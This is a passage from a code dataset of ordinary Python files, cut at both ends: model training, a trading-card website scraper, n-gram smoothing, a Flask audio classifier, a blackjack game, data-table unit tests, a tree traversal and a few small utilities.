dsntnn.euclidean_losses(coords, target_var)\n# # Per-location regularization losses\n# reg_losses = dsntnn.js_reg_losses(heatmaps, target_var, sigma_t=1.0)\n# # Combine losses into an overall loss\n# loss = dsntnn.average_loss(euc_losses + reg_losses)\n#\n# # Calculate gradients\n# optimizer.zero_grad()\n# loss.backward()\n#\n# # Update model parameters with RMSprop\n# optimizer.step()\n#\n# #single train\n\nimg = cv2.imread(os.path.join(train_path, train_data[0]['filepath']))\nprint(os.path.join(train_path, train_data[0]['filepath']))\nh, w = img.shape[:2]\nprint('h[],w[]', h, w)\nprint('filepath',train_data[0]['filepath'])\n# print(img)\nimg = cv2.resize(img, (image_size[0],image_size[1]))\nimg = np.array(img)\ntmpc = train_data[0]['bboxes'][0]\nprint('lab', tmpc)\nlabel_all = [int((tmpc['x1'] + tmpc['x2'])/2 / w * image_size[0]),int((tmpc['y1'] + tmpc['y2'])/2 / h * image_size[1])]\nprint('lab', label_all)\nraccoon_face_tensor = torch.from_numpy(img).permute(2, 0, 1).float()\ninput_tensor = raccoon_face_tensor.div(255).unsqueeze(0)\ninput_var = input_tensor.cuda()\n\n\nprint(\"label_all:\",label_all)\neye_coords_tensor = torch.Tensor([[label_all]])\ntarget_tensor = (eye_coords_tensor * 2 + 1) / torch.Tensor(image_size) - 1\ntarget_var = target_tensor.cuda()\n\nmodel = CoordRegressionNetwork(n_locations=1).cuda()\n\ncoords, heatmaps = model(input_var)\n\nprint('Initial prediction: {:0.4f}, {:0.4f}'.format(*list(coords.data[0, 0])))\nplt.imshow(heatmaps[0, 0].data.cpu().numpy())\nplt.scatter([label_all[0]], [label_all[1]], color='red', marker='X')\nplt.show()\n\noptimizer = optim.RMSprop(model.parameters(), lr=2.5e-4)\nepoch_num = 40\n\nfor i in range(epoch_num):\n count =1\n for c in train_data[:]:\n # Forward pass\n img = cv2.imread(os.path.join(train_path, c['filepath']))\n h, w = img.shape[:2]\n img = cv2.resize(img, (image_size[0],image_size[1]))\n img = np.array(img)\n tmpc = c['bboxes'][0]\n label_all = [int((tmpc['x1'] + tmpc['x2'])/2 / w * image_size[0]),int((tmpc['y1'] + tmpc['y2'])/2 / h * image_size[1])]\n\n raccoon_face_tensor = torch.from_numpy(img).permute(2, 0, 1).float()\n input_tensor = raccoon_face_tensor.div(255).unsqueeze(0)\n input_var = input_tensor.cuda()\n\n\n eye_coords_tensor = torch.Tensor([[label_all]])\n target_tensor = (eye_coords_tensor * 2 + 1) / torch.Tensor(image_size) - 1\n target_var = target_tensor.cuda()\n\n coords, heatmaps = model(input_var)\n\n # Per-location euclidean losses\n euc_losses = dsntnn.euclidean_losses(coords, target_var)\n # Per-location regularization losses\n reg_losses = dsntnn.js_reg_losses(heatmaps, target_var, sigma_t=1.0).cuda()\n # Combine losses into an overall loss\n loss = dsntnn.average_loss(euc_losses + reg_losses).cuda()\n\n # Calculate gradients\n optimizer.zero_grad()\n loss.backward()\n count +=1\n\n if count%200==0:\n print(\"process: \"+str(count)+\" /2000 in epoch: \" +str(i)+str(target_var))\n print(\"loss: \"+str(loss) +\" coords: \"+str(list(coords.data[0, 0])))\n logging.info(\"process: \"+str(count)+\" /2000 in epoch: \" +str(i)+str(target_var))\n\n # Update model parameters with RMSprop\n optimizer.step()\n\n if (i+1)%2 ==0:\n torch.save(model, model_PATH)\n print(\"save model in \"+str(i))\n logging.info(\"save model in \"+str(i))\n\n# Predictions after training\nprint('Predicted coords: {:0.4f}, {:0.4f}'.format(*list(coords.data[0, 0])))\nlogging.info('Predicted coords: {:0.4f}, {:0.4f}'.format(*list(coords.data[0, 0])))\nplt.imshow(heatmaps[0, 0].data.cpu().numpy())\nplt.show()","sub_path":"train_dsntnn.py","file_name":"train_dsntnn.py","file_ext":"py","file_size_in_byte":6553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"437074428","text":"import time\nfrom typing import Generator, Iterable\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom requests_html import HTMLSession\n\nfrom lib import PsaResource, PsaSet\nfrom lib.io import FileWriter\nfrom lib.iter import batch\nfrom lib.psa_card import PsaCard\n\nCardGenerator = Generator[PsaCard, None, None]\n\n\nclass Scraper:\n \n def __init__(self, session: HTMLSession, file_writer: FileWriter):\n self.session = session\n self.file_writer = file_writer\n \n def scrape(self):\n fw = self.file_writer\n cards = get_cards_batched(self.session) \n\n i = 0\n for batch in cards:\n file_name = f\"data/{i:04}.csv\"\n\n fw.open(file_name)\n for card in batch:\n fw.write(card)\n fw.write(\"\\n\")\n fw.close()\n\n i += 1\n\n\ndef endpoint(href):\n BASE_URL = \"https://www.psacard.com\"\n\n return BASE_URL + href\n\n\ndef parse_set(session, href) -> CardGenerator:\n psa_set = PsaSet(session, href)\n print(psa_set)\n\n try:\n time.sleep(0.75)\n yield from psa_set.get_cards()\n except Exception as err:\n print(f\"ERROR: Failed to get cards for set {psa_set}\")\n print(err)\n\n\ndef parse_set_group(session, href) -> CardGenerator:\n url = endpoint(href)\n page = requests.get(url)\n soup = BeautifulSoup(page.content, \"html.parser\")\n\n for link in soup.find_all(\"a\"):\n href = link.get(\"href\")\n if \"alltimefinest\" in href:\n url = endpoint(href)\n page = requests.get(url)\n soup = BeautifulSoup(page.content, \"html.parser\")\n\n set_links = []\n\n for row in soup.find_all(\"tr\"):\n links = [l.get(\"href\") for l in row.findChildren(\"a\")]\n has_gallery = any(\"imagegallery\" in l for l in links)\n if has_gallery:\n set_links.append(links[0])\n\n for href in set_links:\n yield from parse_set(session, href)\n\n\ndef parse_category(session, href) -> CardGenerator:\n url = endpoint(href)\n page = requests.get(url)\n soup = BeautifulSoup(page.content, \"html.parser\")\n\n for link in soup.find_all(\"a\"):\n href = link.get(\"href\")\n if PsaResource.is_setlist_endpoint(href):\n yield from parse_set_group(session, href)\n\n\ndef get_cards(session) -> CardGenerator:\n url = endpoint(\"/psasetregistry/baseball/1\")\n\n page = requests.get(url)\n soup = BeautifulSoup(page.content, \"html.parser\")\n\n for link in soup.find_all(\"a\"):\n href = link.get(\"href\")\n if PsaResource.is_setlist_endpoint(href):\n yield from parse_category(session, href)\n\n\ndef get_cards_batched(session, n=100) -> Generator[Iterable[PsaCard], None, None]:\n yield from batch(get_cards(session), n)\n\n","sub_path":"lib/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"16529761","text":"# -*- coding: UTF-8 -*-\n\nimport json\n\nwith open(\"json1.csv\", \"rt\") as in_file:\n\ttext1 = in_file.read()\n\n# 将字符串转成字典\nuser_dict = json.loads(text1)\n\nwidgetid = user_dict['data']['widgetId']\nprint(widgetid)\n\ndataList = user_dict['data']['data']\n\nfor i in dataList:\n\tprint(i['metricsName'])","sub_path":"case100/35_strDic.py","file_name":"35_strDic.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"629255224","text":"import numpy as np\nimport pandas as pd\nfrom joblib import Parallel, delayed\nfrom calculate_impact_mortality import calculate_impact_mortality\nfrom define_exposures import call_exposures\nfrom multiprocessing import cpu_count\nfrom scipy.sparse import csr_matrix, vstack\n\n\ndef impact_monte_carlo(directory_hazard, scenarios, years_list, n_mc, uncertainty_variables_list=['all'], kanton=None,\n age_group=None, save_median_mat=True):\n \"\"\"Monte Carlo Simulation of the impacts:\n\n Parameters:\n directory_hazard (str): directory to a folder containing one tasmax (and one tasmin) folder with all the\n data files\n scenarios (list): scenarios for which to compute the hazards\n years_list (list): years for which to compute the hazard\n uncertainty_variables_list (list): variables for which to consider the uncertainty. Default: ['all']\n kanton (str or None): Name of canton. Default: None (all of Switzerland)\n age_group (str or None): specific age group, as given in the \"GIS_Data_code\" of the age_categories.csv file. Default: None\n save_median_mat (bool): rather we save the impact matrix . Default = True\n\n Returns:\n impacts for each Monte Carlo run, year, scenario, exposure category, optionally impact matrix\n \"\"\"\n\n # the exposures are called outside the loop as their is no uncertainty in this entitiy.\n print('\\n Starting Exposures generator \\n')\n exposures = call_exposures(kanton=kanton, age_group=age_group)\n print('\\n Ended Exposures generator \\n')\n\n if uncertainty_variables_list != ['all']:\n impact_uncertainty_variable = {} # initiate dictionary for the uncertainty variables, if not 'all'\n for uncertainty_variable in uncertainty_variables_list:\n\n ###########################################################################################################\n # loop over years\n\n impact_scenario = {} # initiate dictionary for the scenarios\n\n if save_median_mat:\n matrices_scenario = {} # if we save the matrices, make dictionary for those\n\n for scenario in scenarios:\n\n ###################################################################################################\n # loop over variable with an uncertainty\n\n impact_year = {} # for the years\n\n if save_median_mat:\n matrices_year = {} # for the matrices and years\n\n for year in years_list:\n\n #######################################################################################\n # monte carlo calculating the impact for the given scenario, year and variable\n\n ncores_max = cpu_count() # get the number of cores available\n\n impact = Parallel(n_jobs=ncores_max)(delayed(calculate_impact_mortality)(directory_hazard,\n scenario, year, exposures,\n uncertainty_variable=uncertainty_variable,\n kanton=kanton,\n save_median_mat=save_median_mat)\n for i in range(0, n_mc)) # calculate the impact on different cores\n ########################################################################################\n\n impact_year[str(year)] = pd.DataFrame() # panda dataframe of the impacts for the different exposures\n # and runs\n for e_ in exposures:\n impact_year[str(year)][e_] = np.zeros(n_mc)\n\n if save_median_mat:\n matrices_year[str(year)] = {} # for the matrices, we save them in yet another dictionary as we\n # can't have a panda dataframe of matrices\n\n for e_ in exposures:\n for i_ in range(0, n_mc):\n impact_year[str(year)][e_][i_] = impact[i_][0][e_] # change the order of the monte carlo\n # output to fit the panda dataframe\n\n if save_median_mat: # calculate the median for each grid point from the n runs\n # we could also here save the max and min matrix to reproduce some of the plots\n # with the error included\n matrices_year[str(year)][e_] = csr_matrix(np.median(vstack(impact[i_][1][e_]\n for i_ in range(n_mc)).todense(),\n axis=0))\n\n del impact\n impact_scenario[scenario] = impact_year\n\n if save_median_mat:\n matrices_scenario[scenario] = matrices_year\n\n if uncertainty_variable != 'all':\n impact_uncertainty_variable[uncertainty_variable] = impact_scenario\n\n if uncertainty_variable == 'all':\n if not save_median_mat:\n return [impact_scenario] # return only the total loss for each category\n else:\n return [impact_scenario, matrices_scenario] # return the loss and the matrices\n\n else:\n return [impact_uncertainty_variable] # in the case of the sensibility analysis, the dictionary of the output\n # has an extra level with corresponding to the variable varied\n","sub_path":"src/impact_calculation/impact_monte_carlo_parallel.py","file_name":"impact_monte_carlo_parallel.py","file_ext":"py","file_size_in_byte":5738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"80782125","text":"import nltk\nimport re\nimport os\nimport numpy as np\n\ndef smooth_count(n_gram, n, total_word_type_num, c_threshold):\n \"\"\"\n convert count to smoothed count\n :param n_gram: un-smoothed n-gram model(contais word pair and their un-smoothed count)\n :param c_threshold: threshold for c\n :param n: which kind of n-gram, for example n=2: bigram, n=3: trigram\n :param total_word_type_num: |V|, total number of words in the corpus\n :return: smoothed count in a dictionary(with its word pair)\n \"\"\"\n\n for category in n_gram:\n # see method comment below to check what's returned for get_count_list(n_gram[category])\n unique_pair_count, count = get_count_list(n_gram[category])\n N_c = [0 for x in range(max(unique_pair_count) + 1)]\n c = [0 for x in range(max(unique_pair_count) + 1)]\n for i in range(len(N_c)):\n N_c[i] = unique_pair_count.count(i)\n\n if n == 1:\n # \" For unigrams, you never have c=0 because of using , so you can start Good-Turing at c=1\"\n # \" for our unigram our c would start at 2 and we would adjust everything until say a k = 10.\"\n # https://piazza.com/class/is89hasycmjt9?cid=155\n # calculate c* according to N_c\n for j in range(len(N_c)-2):\n i = j + 2\n if i <= c_threshold and N_c[i] != 0:\n c[i] = (i + 1) * N_c[i + 1] / N_c[i]\n elif i <= c_threshold and N_c[i] == 0:\n c[i] = (i + 1) * N_c[i + 1] / (N_c[i] + 1)\n elif i > c_threshold:\n c[i] = i\n elif n > 1:\n # N0 = V^2 -N, where V is total_word_type_num, N is total number of n-gram that has shown up\n N_c[0] = (total_word_type_num ** 2) - count\n # calculate c* according to N_c\n for i in range(len(N_c)):\n if i <= c_threshold and N_c[i] != 0:\n c[i] = (i + 1) * N_c[i + 1] / N_c[i]\n elif i <= c_threshold and N_c[i] == 0:\n c[i] = (i + 1) * N_c[i + 1] / (N_c[i] + 1)\n elif i > c_threshold:\n c[i] = i\n\n #put smoothed count into the n-gram model\n for second_and_after_word, inner_dict in n_gram[category].items():\n for key, value in inner_dict.items():\n n_gram[category][second_and_after_word][key] = c[value]\n\n #print(c[0], N_c[0])\n return n_gram, c[0]\n\ndef get_count_list(ngram):\n \"\"\"\n return count value from n gram in a list, for example\n :param ngram: i.e. {'Second...':{'first':1},'Second2...':{'first':1,'se':2},'Second3...':{'first':1}}\n :return: return count = 4 (all ngram pairs) and value = [1,1,2,1]\n \"\"\"\n value = []\n count = 0\n for seoncd_and_after_word, inner_dict in ngram.items():\n for first_word, count in inner_dict.items():\n value.append(count)\n return value, len(value)\n\n# def unigram(dataset):\n# unigram = {}\n# for category in dataset:\n# unigram[category] = {}\n# directory = os.path.join('data_corrected', 'classification task', category, 'train_docs')\n# for file_name in os.listdir(directory):\n# for sentence in read_file(file_name, directory):\n# unigram[category] = unigram_count(sentence, unigram[category])\n#\n# # unigram = {'a':{'0':1,'1':15,'2':2},'b':{'1':19,'2':2}}\n# unigram_prob = unigram_prob_generator(unigram)\n# return unigram_prob\n\nif __name__ == '__main__':\n # dataset = ['atheism', 'autos', 'graphics', 'medicine', 'motorcycles', 'religion', 'space']\n # unigram_prob = unigram(dataset)\n # print()\n sen = 'I eat a apple eat a'\n n = {'topic': {'UNK': {'eat': 2}, 'eat': {'a': 2}, 'a': {'UNK': 1}}}\n uni = {'topic': {'': {'UNK': 2, 'a': 2, 'eat': 3}}}\n smooth_count(n_gram=uni,n=1, total_word_type_num= 1, c_threshold=10)\n","sub_path":"P1/smooth.py","file_name":"smooth.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"647616358","text":"from flask import Flask, jsonify, render_template\nimport pyaudio\nimport wave\nfrom pyAudioAnalysis import audioTrainTest as aT\nimport numpy as np\nimport sys\n \nFORMAT = pyaudio.paInt16\nCHANNELS = 2\nRATE = 44100\nCHUNK = 1024\nRECORD_SECONDS = 10\nWAVE_OUTPUT_FILENAME = \"recording6.wav\"\n \naudio = pyaudio.PyAudio()\n\nframes = []\n\ndef record():\n\t# start Recording\n\tstream = audio.open(format=FORMAT, channels=CHANNELS,\n\t\t rate=RATE, input=True,\n\t\t frames_per_buffer=CHUNK)\n\t# print \"recording...\"\n\tfor i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n\t data = stream.read(CHUNK)\n\t frames.append(data)\n\t# print \"finished recording\"\n\t# stop Recording\n\tstream.stop_stream()\n\tstream.close()\n\taudio.terminate()\n\treturn 'recorded'\n\ndef save(output_name):\n\twaveFile = wave.open(output_name, 'wb')\n\twaveFile.setnchannels(CHANNELS)\n\twaveFile.setsampwidth(audio.get_sample_size(FORMAT))\n\twaveFile.setframerate(RATE)\n\twaveFile.writeframes(b''.join(frames))\n\twaveFile.close()\n\ndef classify(filename):\n\tisSignificant = 0.8 #TN/FP Threshold\n\n\t# Result, P, classNames = aT.fileClassification(filename, \"knnDE\",\"knn\")\n\tResult, P, classNames = aT.fileClassification(filename, \"knnDE2\",\"knn\")\n\twinner = np.argmax(P) #pick the result with the highest probability value.\n\tans = {}\n\tif P[winner] > isSignificant :\n\t \t# print(\"File: \" + filename + \" is in category: \" + classNames[winner] + \", with probability: \" + str(P[winner]))\n\t \t# ans += \"File: \" + filename + \" is in category: \" + classNames[winner] + \", with probability: \" + str(P[winner])\n\t \tans = {\"class\": classNames[winner], \"prob\":P[winner]}\n\telse :\n\t # print(\"Can't classify sound: \" + str(P))\n\t \tans = {\"class\": \"none detected\"}\n\n\treturn ans\n\n\n\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n\t# record()\n\t# save(WAVE_OUTPUT_FILENAME)\n\t# ans = classify(WAVE_OUTPUT_FILENAME)\n # \treturn \"Hello, World!\\n\" + ans['class']\n \treturn render_template('index.html')\n\n# @app.route('/api/get_messages/', methods = ['GET'])\n@app.route('/api/get_messages', methods = ['GET'])\n\ndef get_messages():\n# def get_messages(filename):\n\n # json = request.get_json()\n # if json['user'] == \"larry\":\n # return jsonify({'messages':['test1', 'test2']})\n\n record()\n save(WAVE_OUTPUT_FILENAME)\n ans = classify(WAVE_OUTPUT_FILENAME)\n return jsonify(ans)\n","sub_path":"miniFlask/rumblemini.py","file_name":"rumblemini.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"445757460","text":"from card import Card\nfrom deck import Deck\nfrom player import Player\nfrom dealer import Dealer\nfrom interface import Interface\nimport sys\n\nclass Game:\n \"\"\"Run the main Blackjack game loop\n\n Responsibilities:\n * Starts Game\n * Starts New Hand if Player has $\n * Evaluate who wins and loses\n * Pays out bets\n\n Collaborators:\n * Card & Deck\n * Player & Dealer\n * Interface for input & output\n \"\"\"\n\n def __init__(self):\n self.interface = Interface()\n\n def game_start(self):\n self.player = Player()\n self.dealer = Dealer()\n\n\n def start_hand(self):\n self.player.bank -= 10\n self.deck = Deck()\n self.deck.shuffle_deck()\n self.player.take_a_hit(self.deck)\n self.dealer.take_a_hit(self.deck)\n self.player.take_a_hit(self.deck)\n self.dealer.take_a_hit(self.deck)\n self.interface.show_current(self.player, self.dealer)\n\n def blackjack_check(self):\n if self.dealer.blackjack():\n if self.player.blackjack():\n self.interface.show_final(self.player, self.dealer)\n self.player.bank += 10\n self.interface.you_push(self.player)\n #self.clear_hands()\n return False#Hand is over\n else:\n self.interface.show_final(self.player, self.dealer)\n self.interface.you_lose(self.player)\n #self.clear_hands()\n return False#Hand is over\n elif self.player.blackjack():\n self.player.bank += 25\n self.interface.blackjack(self.player)\n #self.clear_hands()\n return False#Hand is over\n\n def player_turn(self):##Come back to this\n while True:\n if self.interface.player_choice(self.player, self.deck):\n self.interface.show_current(self.player, self.dealer)\n return True#if player stands\n self.interface.show_current(self.player, self.dealer)\n if self.player.hand_value() > 21:\n self.interface.you_lose(self.player)\n self.clear_hands()\n return False#end hand\n\n\n def dealer_turn(self):\n while True:\n self.interface.show_dealer_hand(self.dealer)\n self.interface.show_dealer_total(self.dealer)\n if self.dealer.hand_value() <= 16:\n self.dealer.take_a_hit(self.deck)\n return True\n elif self.dealer.hand_value() >= 17:\n return False\n\n\n def win_loss_check(self):\n self.interface.show_final(self.player, self.dealer)\n if self.dealer.hand_value() > 21:\n self.player.bank += 20\n self.interface.you_win(self.player)\n self.clear_hands()\n elif self.dealer.hand_value() > self.player.hand_value():\n self.interface.you_lose(self.player)\n self.clear_hands()\n elif self.dealer.hand_value() == self.player.hand_value():\n self.player.bank += 10\n self.interface.you_push(self.player)\n self.clear_hands()\n else:\n self.player.bank += 20\n self.interface.you_win(self.player)\n self.clear_hands()\n\n def check_bank(self, player):\n if self.player.bank > 0:\n print(\"Time to play a new hand\")\n else:\n self.interface.no_money(self)\n return sys.exit\n\n def clear_hands(self):\n del self.player.hand[:]\n del self.dealer.hand[:]\n\n def main_game(self):\n self.interface.welcome_message()\n self.game_start()\n while True:\n self.start_hand()\n while True:\n self.blackjack_check()\n self.player_turn()\n self.dealer_turn()\n self.win_loss_check()\n self.clear_hands()\n self.check_bank(self.player)\n break\n\nif __name__ == \"__main__\":\n main_game()\n","sub_path":"blackjack/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"554123154","text":"\"\"\"\nCreated on Dec 1, 2017\n\n@author: mjiang\nming.jiang@epfl.ch\n\"\"\"\n\nimport numpy as np\n\n\ndef pow_method(A, At, im_size, tol, max_iter, verbose=False):\n \"\"\"\n Computes the spectral radius (maximum eigen value) of the operator A\n \n :param A: function handle of direct operator\n :param At: function handle of adjoint operator\n :param im_size: size of the image\n :param tol: tolerance of the error, stopping criterion\n :param max_iter: max iteration\n :return: spectral radius of the operator\n \"\"\"\n if len(im_size) == 2:\n x = np.random.randn(im_size[0], im_size[1])\n elif len(im_size) == 3:\n x = np.random.randn(im_size[0], im_size[1], im_size[2])\n x /= np.linalg.norm(x)\n init_val = 1\n \n for it in np.arange(max_iter):\n y = A(x)\n x = At(y)\n val = np.linalg.norm(x)\n rel_var = np.abs(val-init_val) / init_val\n if rel_var < tol:\n break\n init_val = val\n x /= val\n\n if verbose:\n print(\"Iteration: \", it, \", val: \", val)\n \n return val\n","sub_path":"tools/maths.py","file_name":"maths.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"605859854","text":"from sys import platform\nimport shutil\nimport os.path\nfrom os import path\n\nif platform == \"linux\" or platform == \"linux2\":\n from IPython.core.display import display\n path = str(\"/content/pracaMgr\")\nelif platform == \"darwin\":\n path = str(\"./\")\n # from google.colab import drive\n # drive.mount('/content/drive', force_remount=True)\nelif platform == \"win32\":\n path = str(\"../\")\n\n\"\"\"\nSkrypt sprawdzajacy poprawnosc polaczenia do dysku Google\nW przypadku bledow cala operacja treningu/testu na Google Colab zostanie zatrzymana\nTest opera sie na stworzeniu losowego pliku, eksporcie go na dysk Google, a nastepnie proba jego usuniecia\n\"\"\"\n\nworking_directory = os.getcwd()\nabsolute_path = working_directory + '/Example_file.txt'\n\n# Create example file\nwith open(absolute_path, \"w\") as f:\n print(\"This is a test file\", file=f)\n\n# Check if the file was created:\ntry:\n os.path.exists(absolute_path)\nexcept OSError as e:\n print(\"File is not created correctly\")\n raise\n\ntry:\n # Sprobuj skopiowac plik na dysk Google\n shutil.copy(absolute_path, \"/content/drive/My Drive/pracaMgr/Weights/Example_file.txt\")\n try:\n os.path.exists(\"/content/drive/My Drive/pracaMgr/Weights/Example_file.txt\")\n print(\"Following path exists, file was successfully exported\")\n os.remove(\"/content/drive/My Drive/pracaMgr/Weights/Example_file.txt\")\n except Exception as e:\n print(\"File is not on Google Drive!\")\n print(e)\n raise\nexcept OSError as e:\n print(\"Problems with a path - it does not exist\")\n print(absolute_path)\n raise\nexcept Exception as e:\n print('Saving was not possible, sorry')\n print(e)\n raise\nfinally:\n os.remove(\"Example_file.txt\")\n","sub_path":"GoogleDriveChecker.py","file_name":"GoogleDriveChecker.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"49303698","text":"'''\nUnit tests for data.py\n'''\n\nimport unittest\nimport os\nimport numpy as np\nfrom matplotlib.mlab import csv2rec\nfrom macroeco.data import DataTable, Metadata\n\nclass TestDataTable(unittest.TestCase):\n\n def setUp(self):\n '''Write test xytable csv file.'''\n\n self.xyfile1 = open('xyfile1.csv','w')\n self.xyfile1.write('''spp_code, x, y, count\n 0, 0, 0, 1\n 0, 0, 0, 2\n 0, 0, 1, 1\n 1, 0, 0, 1\n 1, 1, 0, 2''')\n self.xyfile1.close()\n self.xyarr1 = csv2rec('xyfile1.csv')\n\n def tearDown(self):\n os.remove('xyfile1.csv')\n\n def test_error_if_file_type_not_csv(self):\n self.assertRaises(TypeError, DataTable, 'file.txt')\n \n def test_meta_None_if_no_meta_file(self):\n xy1 = DataTable('xyfile1.csv')\n self.assertEqual(xy1.meta, None)\n\n def test_table_is_correct(self):\n xy1 = DataTable('xyfile1.csv')\n np.testing.assert_array_equal(xy1.table, self.xyarr1)\n\n def test_get_subtable(self):\n xy1 = DataTable('xyfile1.csv')\n xy1.meta = {('x', 'maximum'): 1,\n ('x', 'minimum'): 0,\n ('x', 'precision'): 1,\n ('y', 'maximum'): 1,\n ('y', 'minimum'): 0,\n ('y', 'precision'): 1}\n\n # Whole table\n sub = xy1.get_subtable({})\n np.testing.assert_array_equal(sub, self.xyarr1)\n\n sub = xy1.get_subtable({'x': [('>=', 0),('<', 2)], 'y': [('>=', 0),\n ('<', 2)]})\n np.testing.assert_array_equal(sub, self.xyarr1)\n\n # Subset\n sub = xy1.get_subtable({'spp_code': ('==', 0)})\n np.testing.assert_array_equal(sub, self.xyarr1[0:3])\n\n sub = xy1.get_subtable({'spp_code': ('==', 0), 'x': ('>', 0)})\n np.testing.assert_array_equal(sub, self.xyarr1[2])\n\nclass TestMetadata(unittest.TestCase):\n \n def setUp(self):\n '''Write test data and metadata file.'''\n\n self.xyfile1 = open('xyfile1.csv','w')\n self.xyfile1.write('''x, y\n 0, 0\n 0, 0\n 0, 0\n 1, 0\n 1, 1''')\n self.xyfile1.close()\n\n self.xymeta = open('xyfile1.xml','w')\n self.xymeta.write('''\n\n\nUnittest XML \n\nNA\n-79.5915\n-79.5915\n8.975\n10\n\n\n\n\ny\ncell\nx0.0\n99.90.1\n''')\n self.xymeta.close()\n\n def tearDown(self):\n os.remove('xyfile1.csv')\n os.remove('xyfile1.xml')\n\n def test_metadata_correct_read(self):\n # Should read values correctly from sample file, including None for\n # attributes that do not exist and elements that do not exist.\n xy1 = DataTable('xyfile1.csv')\n self.assertEqual(len(xy1.meta), 8)\n self.assertEqual(xy1.meta, {('x', 'maximum'): 99.9,\n ('x', 'minimum'): 0.0,\n ('x', 'precision'): 0.1,\n ('x', 'type'): 'interval',\n ('y', 'maximum'): None,\n ('y', 'minimum'): None,\n ('y', 'precision'): None,\n ('y', 'type'): 'ordinal'})\n\n def test_physical_coverage(self):\n meta = Metadata('xyfile1.csv', [])\n edges = meta.get_physical_coverage()\n self.assertEqual(edges, [8.975, -79.5915, 10, -79.5915])\n\n def test_title(self):\n meta = Metadata('xyfile1.csv', [])\n self.assertEqual(meta.get_title(), 'Unittest XML')\n","sub_path":"test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"54667369","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\n#\n# 代码中的类名、方法名、参数名已经指定,请勿修改,直接返回方法规定的值即可\n#\n#\n# @param pRoot TreeNode类\n# @return int整型二维数组\n#\nclass Solution:\n def Print(self, pRoot: TreeNode):\n # write code here\n ans = list()\n if not pRoot:\n return ans\n stack = [[pRoot], []]\n cur = 0\n nex = 1\n cur_ans = list()\n while stack[0] or stack[1]:\n node = stack[cur].pop(-1)\n cur_ans.append(node.val)\n if cur == 0:\n if node.left:\n stack[nex].append(node.left)\n if node.right:\n stack[nex].append(node.right)\n else:\n if node.right:\n stack[nex].append(node.right)\n if node.left:\n stack[nex].append(node.left)\n if not stack[cur]:\n ans.append(cur_ans)\n cur_ans = list()\n cur = 1 - cur\n nex = 1 - nex\n\n return ans\n\n\nclass Solution2:\n def zigzagLevelOrder(self, root: TreeNode) -> 'List[List[int]]':\n if not root:\n return []\n\n ans = []\n stacks = [[], []]\n current = 0\n next = 1\n stacks[current].append(root)\n\n # cur_depth = 0\n while stacks[current]:\n # node = stacks[current].pop()\n #\n # while len(ans) < cur_depth + 1:\n # ans.append([])\n #\n # ans[cur_depth].append(node.val)\n #\n # if current == 0:\n # if node.left:\n # stacks[next].append(node.left)\n # if node.right:\n # stacks[next].append(node.right)\n # else:\n # if node.right:\n # stacks[next].append(node.right)\n # if node.left:\n # stacks[next].append(node.left)\n #\n # if len(stacks[current]) == 0:\n # cur_depth += 1\n #\n # current = 1 - current\n # next = 1 - next\n\n # NOTE: another recursive process\n tempAns = []\n for idx in range(len(stacks[current]) - 1, -1, -1):\n node = stacks[current][idx]\n tempAns.append(node.val)\n\n if current == 0:\n if node.left:\n stacks[next].append(node.left)\n if node.right:\n stacks[next].append(node.right)\n else:\n if node.right:\n stacks[next].append(node.right)\n if node.left:\n stacks[next].append(node.left)\n\n stacks[current].clear()\n current = 1 - current\n next = 1 - next\n ans.append(tempAns)\n\n return ans\n\n\na = {'b':1, 'b6y':166,'bg':1,'c':311,'ba':2,'be':6,'bd':10}\n\n# a.sort(key=cmp_to_key(lambda x1,x2: x2-x1)) # list sort\n\nimport operator\na1 = sorted(a.items(), key=operator.itemgetter(1))\na2 = sorted(a.items(), key=lambda x:x[1])\n\nprint(a1,'\\n', a2)","sub_path":"solutions/tree/problem103_Binary Tree Zigzag Level Order Traversal.py","file_name":"problem103_Binary Tree Zigzag Level Order Traversal.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"63017132","text":"#encoding=utf-8\nimport math\nimport os\nimport random\nimport sys\nimport time\n\nimport numpy as np\nfrom six.moves import xrange # pylint: disable=redefined-builtin\nimport tensorflow as tf\n\nfrom data_utils import *\nfrom seq2seq_model import *\nimport codecs\n\n\ntf.app.flags.DEFINE_float(\"learning_rate\", 0.01, \"Learning rate.\")\ntf.app.flags.DEFINE_float(\"learning_rate_decay_factor\", 0.99,\n \"Learning rate decays by this much.\")\ntf.app.flags.DEFINE_float(\"max_gradient_norm\", 5.0,\n \"Clip gradients to this norm.\")\ntf.app.flags.DEFINE_integer(\"batch_size\", 64,\n \"Batch size to use during training.\")\ntf.app.flags.DEFINE_integer(\"size\", 256, \"Size of each model layer.\")\ntf.app.flags.DEFINE_integer(\"num_layers\", 2, \"Number of layers in the model.\")\ntf.app.flags.DEFINE_integer(\"source_vocab_size\", 1000, \"source vocabulary 